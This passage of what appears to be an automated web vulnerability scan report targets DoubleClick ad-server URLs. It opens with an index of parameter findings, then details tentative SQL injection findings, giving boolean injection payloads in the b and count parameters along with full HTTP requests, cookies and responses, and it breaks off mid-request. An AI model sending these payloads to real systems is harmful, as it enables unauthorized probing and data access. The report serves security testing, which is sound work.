3.300. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [e parameter]

3.301. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [epartner parameter]

3.302. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [event parameter]

3.303. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [h parameter]

3.304. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [l parameter]

3.305. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [nd parameter]

3.306. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [o parameter]

3.307. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [oepartner parameter]

3.308. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [orh parameter]

3.309. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [p parameter]

3.310. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pdom parameter]

3.311. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pg parameter]

3.312. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pid parameter]

3.313. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pp parameter]

3.314. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ppartner parameter]

3.315. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [pt parameter]

3.316. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [ra parameter]

3.317. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [rqid parameter]

3.318. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sg parameter]

3.319. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [site parameter]

3.320. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [sz parameter]

3.321. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2 [t parameter]

3.322. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [b parameter]

3.323. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cid parameter]

3.324. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [count parameter]

3.325. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [cpnmodule parameter]

3.326. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [e parameter]

3.327. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [epartner parameter]

3.328. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [event parameter]

3.329. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [h parameter]

3.330. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [l parameter]

3.331. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [nd parameter]

3.332. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [o parameter]

3.333. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [oepartner parameter]

3.334. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [orh parameter]

3.335. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [p parameter]

3.336. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pdom parameter]

3.337. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pg parameter]

3.338. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pid parameter]

3.339. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pp parameter]

3.340. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ppartner parameter]

3.341. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [pt parameter]

3.342. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [ra parameter]

3.343. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [rqid parameter]

3.344. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sg parameter]

3.345. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [site parameter]

3.346. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [sz parameter]

3.347. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3 [t parameter]

3.348. http://ad.doubleclick.net/adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview [source parameter]

3.349. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter]

3.350. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [b parameter]

3.351. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter]

3.352. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cid parameter]

3.353. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter]

3.354. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [count parameter]

3.355. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter]

3.356. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [cpnmodule parameter]

3.357. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter]

3.358. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [e parameter]

3.359. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter]

3.360. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [epartner parameter]

3.361. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter]

3.362. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [event parameter]

3.363. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter]

3.364. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [h parameter]

3.365. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter]

3.366. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [l parameter]

3.367. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter]

3.368. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [nd parameter]

3.369. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter]

3.370. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [o parameter]

3.371. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter]

3.372. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [oepartner parameter]

3.373. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter]

3.374. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [orh parameter]

3.375. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter]

3.376. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [p parameter]

3.377. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter]

3.378. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pdom parameter]

3.379. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter]

3.380. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pg parameter]

3.381. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter]

3.382. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pid parameter]

3.383. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter]

3.384. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pp parameter]

3.385. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter]

3.386. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ppartner parameter]

3.387. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter]

3.388. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [pt parameter]

3.389. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter]

3.390. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [ra parameter]

3.391. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter]

3.392. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [rqid parameter]

3.393. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter]

3.394. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sg parameter]

3.395. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter]

3.396. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [site parameter]

3.397. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter]

3.398. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [sz parameter]

3.399. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter]

3.400. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.21 [t parameter]

3.401. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter]

3.402. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [b parameter]

3.403. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter]

3.404. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cid parameter]

3.405. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter]

3.406. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [count parameter]

3.407. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter]

3.408. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [cpnmodule parameter]

3.409. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter]

3.410. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [e parameter]

3.411. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter]

3.412. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [epartner parameter]

3.413. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter]

3.414. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [event parameter]

3.415. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter]

3.416. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [h parameter]

3.417. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter]

3.418. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [l parameter]

3.419. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter]

3.420. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [nd parameter]

3.421. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter]

3.422. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [o parameter]

3.423. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter]

3.424. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [oepartner parameter]

3.425. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter]

3.426. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [orh parameter]

3.427. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter]

3.428. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [p parameter]

3.429. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter]

3.430. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pdom parameter]

3.431. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter]

3.432. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pg parameter]

3.433. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter]

3.434. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pid parameter]

3.435. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter]

3.436. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pp parameter]

3.437. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter]

3.438. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ppartner parameter]

3.439. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter]

3.440. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [pt parameter]

3.441. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter]

3.442. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [ra parameter]

3.443. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter]

3.444. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [rqid parameter]

3.445. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter]

3.446. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sg parameter]

3.447. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter]

3.448. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [site parameter]

3.449. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter]

3.450. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [sz parameter]

3.451. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter]

3.452. http://ad.doubleclick.net/adj/N5823.CNET/B4978620.22 [t parameter]

4. Flash cross-domain policy

5. Silverlight cross-domain policy

6. Cross-domain Referer leakage

6.1. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18

6.2. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.19

6.3. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.20

6.4. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.21

6.5. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102

6.6. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2

6.7. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

6.8. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

6.9. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

6.10. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

6.11. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23

6.12. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15

6.13. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5

6.14. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6

6.15. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20

6.16. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8

6.17. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2

6.18. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3

6.19. http://ad.doubleclick.net/adj/CBS.LASTFM.US/anonymoushome/anonymoushome/overview

7. Cross-domain script include

7.1. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.19

7.2. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.20

7.3. http://ad.doubleclick.net/adi/N1823.bnet.com/B5040075.21

7.4. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102

7.5. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2

7.6. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

7.7. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

7.8. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15

7.9. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5

7.10. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6

7.11. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8

7.12. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2

7.13. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3

8. Robots.txt file

9. HTML does not specify charset

9.1. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18

9.2. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102

9.3. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473103.2

9.4. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781

9.5. http://ad.doubleclick.net/adi/N553.8481.CBSINTERNETNETWORK/B4970757.4

9.6. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23

9.7. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15

9.8. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.5

9.9. http://ad.doubleclick.net/adi/N5823.CBSi/B5448927.6

9.10. http://ad.doubleclick.net/adi/N5823.CNET/B5363262.20

9.11. http://ad.doubleclick.net/adi/N5865.149883.CBS_SPORTS/B5436755.8

9.12. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.2

9.13. http://ad.doubleclick.net/adi/N5996.2496.0512158326521/B5372452.3



1. SQL injection
There are 7 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [b parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The b parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the b parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d1--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:03:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5552

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11e/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d1--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11e/%2a/c%3B237718223%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d2--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:03:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 840

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11e/%2a/a;239957955;0-0;0;61055221;4307-300/250;41448515/41466302/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21%20and%201%3d2--%20&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/Gazelle/11-0737/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-1Ton-_-0401-_-0430"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0401-0430_Branding-1Ton_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

1.2. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [count parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The count parameter appears to be vulnerable to SQL injection attacks. The payloads 14607837'%20or%201%3d1--%20 and 14607837'%20or%201%3d2--%20 were each submitted in the count parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d1--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:08:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 852

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/126/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d1--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=14607837'%20or%201%3d2--%20&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
